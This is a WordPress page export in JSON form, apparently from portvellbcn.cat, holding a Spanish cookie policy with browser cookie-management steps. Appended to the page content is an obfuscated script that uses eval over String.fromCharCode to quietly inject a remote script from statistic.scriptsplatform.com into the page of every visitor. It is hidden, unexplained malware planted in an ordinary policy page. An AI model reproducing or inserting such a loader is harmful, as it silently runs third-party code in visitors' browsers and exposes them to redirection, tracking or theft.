{"id":9947,"date":"2021-04-06T09:22:56","date_gmt":"2021-04-06T07:22:56","guid":{"rendered":"https:\/\/portvellbcn.cat\/es\/cookies\/"},"modified":"2021-04-06T09:29:00","modified_gmt":"2021-04-06T07:29:00","slug":"cookies","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/cookies\/","title":{"rendered":"Cookies"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1617693122267{margin-bottom: 20px !important;}\u00bb]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Cookies<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text]<\/p>\n<div id=\"main\" class=\"s-main\" role=\"main\">\n<div class=\"s-content\">\n<div class=\"m-generic\">\n<div class=\"module-main\">\n<p><strong>Tipos de &#8216;cookies&#8217; utilizadas<\/strong><\/p>\n<p>Esta web puede utilizar tanto &#8216;cookies&#8217; temporales de sesi\u00f3n como &#8216;cookies&#8217; permanentes. Las &#8216;cookies&#8217; de sesi\u00f3n almacenan datos \u00fanicamente mientras el usuario accede a la web y las &#8216;cookies&#8217; permanentes almacenan los datos en el terminal para que sean accedidos y utilizados en m\u00e1s de una sesi\u00f3n.<\/p>\n<p><strong>\u2018Cookies&#8217; de an\u00e1lisis estad\u00edstico<\/strong><\/p>\n<p>S\u00f3n aquelles que permeten fer el seguiment i an\u00e0lisi del comportament dels usuaris en els llocs web. La informaci\u00f3 recollida mitjan\u00e7ant aquest tipus de \u2018cookies\u2019 s&#8217;utilitza en el mesurament de l&#8217;activitat dels llocs web, aplicaci\u00f3 o plataforma i per a l&#8217;elaboraci\u00f3 de perfils de navegaci\u00f3 dels usuaris d&#8217;aquests llocs, per tal d&#8217;introduir millores en el servei en funci\u00f3 de les dades d&#8217;\u00fas que fan els usuaris .<\/p>\n<p><strong>&#8216;Cookies&#8217; de terceros<\/strong><\/p>\n<p>En algunas p\u00e1ginas web se pueden instalar &#8216;cookies&#8217; de terceros que permiten gestionar y mejorar los servicios ofrecidos. Como por ejemplo, servicios estad\u00edsticos de Google Analytics.<\/p>\n<p><strong>\u00bfQu\u00e9 ocurre si bloquea las &#8216;cookies&#8217;?<\/strong><\/p>\n<p>En caso de bloquear el uso de &#8216;cookies&#8217; en su navegador es posible que algunos servicios o funcionalidades de la p\u00e1gina web no est\u00e9n disponibles.<\/p>\n<p>En algunos navegadores se pueden configurar reglas espec\u00edficas para administrar &#8216;cookies&#8217; para cada sitio web, lo que ofrece un control m\u00e1s preciso sobre la privacidad. Esto significa que se puede inhabilitar &#8216;cookies&#8217; de todos los sitios salvo de aquellos en los que se conf\u00ede.<\/p>\n<div id=\"main\" class=\"s-main\" role=\"main\">\n<div class=\"s-content\">\n<div class=\"m-generic\">\n<div class=\"module-main\">\n<p><strong>C\u00f3mo administrar &#8216;cookies&#8217; en el navegador?<\/strong><\/p>\n<p>El usuario tiene la opci\u00f3n de permitir, bloquear o eliminar las &#8216;cookies&#8217; instaladas en su equipo mediante la configuraci\u00f3n de las opciones del navegador instalado en su terminal:<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Para ajustar las &#8216;cookies&#8217; en el navegador Google Chrome:<\/strong><\/p>\n<p>Hacer clic en el men\u00fa situado en la barra de herramientas.<\/p>\n<p>Seleccionar Configuraci\u00f3n.<\/p>\n<p>Hacer clic en Mostar opciones avanzadas.<\/p>\n<p>En la secci\u00f3n &#8216;Privacidad&#8217; hacer clic en el bot\u00f3n Configuraci\u00f3n de contenido.<\/p>\n<p>En la secci\u00f3n de &#8216;Cookies&#8217; se pueden configurar las opciones.<\/p>\n<p><em>M\u00e1s informaci\u00f3n sobre Google Chrome<\/em><\/p>\n<p><em>(<strong><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?hl=es\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/support.google.com\/chrome\/answer\/95647?hl=es<\/a><\/strong>)<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong><strong>Para ajustar las &#8216;cookies&#8217; en el navegador Mozilla Firefox<\/strong><\/strong><\/p>\n<p>En la parte superior de la ventana de Firefox hacer clic en el men\u00fa\u00a0<em>Herramientas<\/em>.<\/p>\n<p>Seleccionar\u00a0<em>Opciones<\/em>.<\/p>\n<p>Seleccionar el panel\u00a0<em>Privacidad<\/em>.<\/p>\n<p>En la opci\u00f3n Firefox podr\u00e1 elegir\u00a0<em>Usar una configuraci\u00f3n personalizada<\/em>\u00a0para el historial para configurar las opciones.<\/p>\n<p><em>M\u00e1s informaci\u00f3n sobre Mozilla Firefox<\/em><\/p>\n<p><em>(<a href=\"https:\/\/support.mozilla.org\/es\/kb\/cookies-informacion-que-los-sitios-web-guardan-en-\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/support.mozilla.org\/es\/kb\/cookies-informacion-que-los-sitios-web-guardan-en-<\/a>)<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><strong><br \/>\n<strong>Para ajustar las &#8216;cookies&#8217; en el navegador Internet Explorer 9<\/strong><\/strong><\/p>\n<p>En la parte superior de la ventana de Internet Explorer hacer clic en el men\u00fa\u00a0<em>Herramientas<\/em>.<\/p>\n<p>Seleccionar la pesta\u00f1a de\u00a0<em>Seguridad<\/em>\u00a0y utilizar la opci\u00f3n\u00a0<em>Eliminar el historial de exploraci\u00f3n<\/em>\u00a0para eliminar las &#8216;cookies&#8217;. Activar la casilla\u00a0<em>&#8216;Cookies&#8217;<\/em>\u00a0y, a continuaci\u00f3n, hacer clic en\u00a0<em>Eliminar<\/em>.<\/p>\n<p>Seleccionar la pesta\u00f1a de\u00a0<em>Seguridad<\/em>\u00a0y acceder a\u00a0<em>Configuraci\u00f3n<\/em>. Mover el control deslizante totalmente hacia arriba para bloquear todas las &#8216;cookies&#8217; o totalmente hacia abajo para permitir todas las &#8216;cookies&#8217;. Tras ello, hacer clic en\u00a0<em>Aceptar<\/em>.<\/p>\n<p><strong><em>M\u00e1s informaci\u00f3n sobre Internet Explorer 9<\/em><\/strong><\/p>\n<p><em>(<a href=\"http:\/\/windows.microsoft.com\/es-es\/windows7\/how-to-manage-cookies-in-internet-explorer-9\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/windows.microsoft.com\/es-es\/windows7\/how-to-manage-cookies-in-internet-explorer-9<\/a>)<\/em><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<footer class=\"s-footer\">\n<nav class=\"n-extra\">\n<h3 class=\"nav-title\"><\/h3>\n<\/nav>\n<\/footer>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<footer class=\"s-footer\">\n<nav class=\"n-extra\">\n<h3 class=\"nav-title\"><\/h3>\n<\/nav>\n<\/footer>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=\u00bb50&#8243;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1617693122267{margin-bottom: 20px !important;}\u00bb] Cookies [\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text] Tipos de &#8216;cookies&#8217; utilizadas Esta web puede utilizar tanto &#8216;cookies&#8217; temporales de sesi\u00f3n como &#8216;cookies&#8217; permanentes. Las &#8216;cookies&#8217; de sesi\u00f3n almacenan datos \u00fanicamente mientras el usuario accede a la web y las &#8216;cookies&#8217; permanentes almacenan los datos en el terminal para que sean accedidos y utilizados en m\u00e1s de una sesi\u00f3n. \u2018Cookies&#8217; de an\u00e1lisis estad\u00edstico S\u00f3n aquelles que permeten fer el seguiment i an\u00e0lisi del comportament dels usuaris en els llocs web. La informaci\u00f3 recollida mitjan\u00e7ant aquest tipus de \u2018cookies\u2019 s&#8217;utilitza en el mesurament de l&#8217;activitat dels llocs web, aplicaci\u00f3 o plataforma i per a l&#8217;elaboraci\u00f3 de perfils de navegaci\u00f3 dels usuaris d&#8217;aquests llocs, per tal d&#8217;introduir millores en el servei en funci\u00f3 de les dades d&#8217;\u00fas que fan els usuaris . &#8216;Cookies&#8217; de terceros En algunas p\u00e1ginas web se pueden instalar &#8216;cookies&#8217; de terceros que permiten gestionar y mejorar los servicios ofrecidos. Como por ejemplo, servicios estad\u00edsticos de Google Analytics. \u00bfQu\u00e9 ocurre si bloquea las &#8216;cookies&#8217;? En caso de bloquear el uso de &#8216;cookies&#8217; en su navegador es posible que algunos servicios o funcionalidades de la p\u00e1gina web no est\u00e9n disponibles. En [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-9947","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/9947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=9947"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/9947\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=9947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}